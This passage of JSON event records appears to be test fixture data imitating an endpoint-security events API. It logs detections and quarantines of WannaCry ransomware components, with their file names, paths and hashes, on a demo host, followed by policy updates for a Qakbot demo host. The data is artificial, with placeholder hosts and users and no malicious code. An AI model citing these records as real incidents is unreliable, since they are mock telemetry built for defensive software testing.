Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy 